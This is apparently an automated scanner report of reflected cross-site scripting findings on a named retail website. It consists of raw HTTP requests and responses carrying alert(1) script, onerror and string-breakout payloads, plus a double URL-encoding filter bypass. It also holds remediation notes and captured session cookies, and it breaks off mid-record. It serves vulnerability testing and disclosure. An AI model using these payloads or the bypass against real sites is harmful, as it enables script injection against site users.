GET /css/modelpage.css55efd"><script>alert(1)</script>6050ea0498?v=1.1 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: http://www.hertzfurniture.com/Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; WRUID=410325474.977200202; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.12.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:02:30 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384118649ca5f79dcac; path=/ Vary: User-Agent Content-Length: 11992
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bd2f9<a>e80f7c98aa8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /css/modelpage.cssbd2f9<a>e80f7c98aa8?v=1.1 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: http://www.hertzfurniture.com/Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; WRUID=410325474.977200202; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.12.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:33:15 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384118649ca5f79dcac; path=/ Vary: User-Agent Content-Length: 11946
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6097f"><script>alert(1)</script>416f2a5bc14 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 911f8<a>f98a4ba5f91 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7796c<a>4ced324bcc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /favicon.ico7796c<a>4ced324bcc4?v=1.0 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.1.10.1317384676; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:30:14 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; path=/ Vary: User-Agent Content-Length: 11934
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61d2e"><script>alert(1)</script>2a3a66be71b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.ico61d2e"><script>alert(1)</script>2a3a66be71b?v=1.0 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.1.10.1317384676; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 11:59:30 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; path=/ Vary: User-Agent Content-Length: 11982
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b0ee3<a>6921f3b3855 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45bfc"><script>alert(1)</script>15377040f0d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9711a"><script>alert(1)</script>384ea5f7ffe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search-complete.php9711a"><script>alert(1)</script>384ea5f7ffe?q=xss+&limit=10&timestamp=1317384695442 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.4.9.1317384693463; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:32:25 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=ra1kqbcn3svcs5uh2khg9rlmq5; path=/ Vary: User-Agent Content-Length: 11998
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dc169<a>6387d5e35e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /search-complete.phpdc169<a>6387d5e35e?q=xss+&limit=10&timestamp=1317384695442 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.4.9.1317384693463; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:32:26 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=ra1kqbcn3svcs5uh2khg9rlmq5; path=/ Vary: User-Agent Content-Length: 11948
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ea921<a>088e5054c61 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /search.phpea921<a>088e5054c61?find-box=xss%20chair%20desk%20shoes HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.6.9.1317384700238; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:04:44 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855783453842a019bd876d56b32; path=/ Vary: User-Agent Content-Length: 11932
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f245f"-alert(1)-"205a1a30ed4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /f245f"-alert(1)-"205a1a30ed4?find-box=xss%20chair%20desk%20shoes HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.6.9.1317384700238; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:04:44 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855783453842a019bd876d56b32; path=/ Vary: User-Agent Content-Length: 31652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a52f"><script>alert(1)</script>8bad230412e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search.php2a52f"><script>alert(1)</script>8bad230412e?find-box=xss%20chair%20desk%20shoes HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.6.9.1317384700238; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:04:30 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/ Vary: User-Agent Content-Length: 11980
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of the find-box request parameter is copied into the HTML document as plain text between tags. The payload 147e8%253cscript%253ealert%25281%2529%253c%252fscript%253e1ac49b1c1fa was submitted in the find-box parameter. This input was echoed as 147e8<script>alert(1)</script>1ac49b1c1fa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the find-box request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /search.php?find-box=xss%20chair%20desk%20shoes147e8%253cscript%253ealert%25281%2529%253c%252fscript%253e1ac49b1c1fa HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.6.9.1317384700238; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:01:07 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384a7e4525ac017ba0d; path=/ Vary: User-Agent Content-Length: 31991
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of the find-box request parameter is copied into an HTML comment. The payload 66c9b--><img%20src%3da%20onerror%3dalert(1)>e54daa9ca31 was submitted in the find-box parameter. This input was echoed as 66c9b--><img src=a onerror=alert(1)>e54daa9ca31 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /search.php?find-box=xss%20chair%20desk%20shoes66c9b--><img%20src%3da%20onerror%3dalert(1)>e54daa9ca31 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.6.9.1317384700238; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:32:03 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384a7e4525ac017ba0d; path=/ Vary: User-Agent Content-Length: 31945
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of the find-box request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd60a</script><img%20src%3da%20onerror%3dalert(1)>c6b76cc6d5c was submitted in the find-box parameter. This input was echoed as bd60a</script><img src=a onerror=alert(1)>c6b76cc6d5c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search.php?find-box=xss%20chair%20desk%20shoesbd60a</script><img%20src%3da%20onerror%3dalert(1)>c6b76cc6d5c HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.6.9.1317384700238; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:31:47 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384a7e4525ac017ba0d; path=/ Vary: User-Agent Content-Length: 31995
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
}); $("form#pagination").submit( function(event) { return false; }); }); var _urlSearch = "/search.php"; var _historyParam = "5a426zjk||find-box~xss chair desk shoesbd60a</script><img src=a onerror=alert(1)>c6b76cc6d5c"; var _gaParamA = { 'gv' : '20', 'pg' : '1'}; function getHistory() { return _historyParam; } function getHMGa() { //HtzMrc GA var ga_param = ''; //need 'pg' first if (_gaParamA['p ...[SNIP]...
3.411. http://www.hertzfurniture.com/search.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.hertzfurniture.com
Path: /search.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6e615%253cscript%253ealert%25281%2529%253c%252fscript%253e2729834ec88 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6e615<script>alert(1)</script>2729834ec88 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /search.php?find-box=xss%20chair%20desk%20s/6e615%253cscript%253ealert%25281%2529%253c%252fscript%253e2729834ec88hoes HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.6.9.1317384700238; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1
Response
